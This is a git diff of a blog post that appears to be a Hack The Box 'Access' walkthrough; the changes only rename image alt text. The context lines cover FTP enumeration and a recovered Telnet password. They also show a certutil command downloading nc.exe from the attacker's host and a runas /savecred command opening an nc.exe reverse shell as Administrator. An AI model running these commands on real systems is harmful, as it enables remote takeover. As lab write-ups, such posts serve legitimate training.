--- a/_posts/2018-12-19-Access.md
+++ b/_posts/2018-12-19-Access.md
@@ -8,7 +8,7 @@ header:
 ---
 Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
 
-![access_info](/assets/images/htb/access/access_info.png)
+![access_info.png](/assets/images/htb/access/access_info.png)
 
 ## User
 To begin the enumeration process, a port scan was run against the target using `masscan`. The purpose of this intial scan is to quickly determine which ports are open so that a more focused `nmap` scan can be performed that will target only the open ports discovered by `masscan`.
@@ -25,11 +25,11 @@ root@kali:~/workspace/hackthebox/Access# nmap -p 21,80,23 -sC -sV -oA scans/disc
 
 As expected, the services listening for connections on Access were FTP, Telnet, and HTTP. A screenshot of the result of the `nmap` scan is shown below.
 
-![nmapresults](/assets/images/htb/access/nmapresults.png)
+![nmapresults.png](/assets/images/htb/access/nmapresults.png)
 
 Of notable significance in this result is the "Anonymous FTP login allowed" line. This means that a user may access the FTP server running on Access as an anonymous user (with no password required). The process of accessing the FTP server in this manner is shown in the image below.
 
-![ftp](/assets/images/htb/access/ftp.png)
+![ftp.png](/assets/images/htb/access/ftp.png)
 
 Two directories were found in the root directory of the FTP server; a `Backups` directory and an `Engineer` directory. Searching through these directories revealed two interesting files; `backup.mdb` in the `Backups` directory and `Access Control.zip` in the `Engineer` directory. The FTP command `get` can be used to transfer the remote files to the local testing host. Depending on the contents being transferred with `get`, it is often advisable to transfer the data in binary mode (as opposed to in ASCII (text) mode). Binary mode transfers data byte-for-byte while ASCII mode will convert line endings from those of the sending system to those of the receiving system. Binary mode can be enabled with the FTP `binary` command. 
 
@@ -43,7 +43,7 @@ Access Control.zip: Zip archive data, at least v2.0 to extract
 
 As files with the `.mdb` extension are not commonly used in Linux environments, a little searching was required to determine how to work with this Microsoft Access Database file type. The [MDBOpener](https://www.mdbopener.com) website was used to upload the `backup.mdb` Microsoft Access Database base, extract the contents, and export the data in CSV format. After parsing through the various tables present within the backup database, the `auth_user` table was eventually found, the contents of which are shown in the image below.
 
-![authuser_csv](/assets/images/htb/access/authuser_csv.png)
+![authuser_csv.png](/assets/images/htb/access/authuser_csv.png)
 
 As the content within the `auth_user` table appears to contain username-password combinations, the username-password pairs were used in attempts to access the Telnet server running on TCP port 23 of the target system, but to no avail. Time to look elsewhere.
 
@@ -82,20 +82,20 @@ Thanks for the information, John.
 
 The username `security` with the password `4Cc3ssC0ntr0ller` can be used to log in Access using `telnet`. At this point, the `user.txt` flag can be read. This process is shown in the screenshot below.
 
-![user_txt](/assets/images/htb/access/user_txt.png)
+![user_txt.png](/assets/images/htb/access/user_txt.png)
 
 ## Root
 While running through the usual privelege escalation enumeration commands, something stood out as odd. After running the `net users administrator` command, it was revealed that the "Password Not Required" property has been set for the Administrator user. This means that the Administrator user is allowed passwordless logon to the system.
 
-![net_user](/assets/images/htb/access/net_user.png)
+![net_user.png](/assets/images/htb/access/net_user.png)
 
 Investigating this property further with the Windows `cmdkey /list` command, it can be seen that the Administrator user has a stored credential on the system.
 
-![cmdkey](/assets/images/htb/access/cmdkey.png)
+![cmdkey.png](/assets/images/htb/access/cmdkey.png)
 
 Continuing enumeration, the `ZKAccess3.5 Security System.lnk` shortcut file found on the Public user's desktop suggests that commands can be run as the Administrator using the `runas` Windows command along with the `/savecred` flag. The `runas` command can be used to run a Windows command as another system user. 
 
-![savecred_link](/assets/images/htb/access/savecred_link.png)
+![savecred_link.png](/assets/images/htb/access/savecred_link.png)
 
 Putting these pieces together, it is clear that system commands can be run as the Administrator user if the `/savecred` flag is included as part of the `runas` command. The fact that the Administrator does not need a password to logon to the system, that the Administrator user has a stored credential on the system, and that the `runas` command with the `/savecred` flag is being used on the system suggests a possible privelege elevation scenario.
 
@@ -109,7 +109,7 @@ C:\Users\security\Music>certutil.exe -urlcache -split -f http://10.10.14.2/nc.ex
 
 A screenshot of this process is included below.
 
-![cert_util](/assets/images/htb/access/cert_util.png)
+![cert_util.png](/assets/images/htb/access/cert_util.png)
 
 With `nc.exe` on the target system and a `nc` listener listening on the attacking system, the command shown below was run on the target system to create a reverse shell connection to the attacking system.
 
@@ -119,4 +119,4 @@ C:\Users\security\Music>runas /user:Administrator /savecred "nc.exe -e cmd.exe 1
 
 From the connection received on the attacking system, the `root.txt` flag can be read.
 
-![root_txt](/assets/images/htb/access/root_txt.png)
+![root_txt.png](/assets/images/htb/access/root_txt.png)
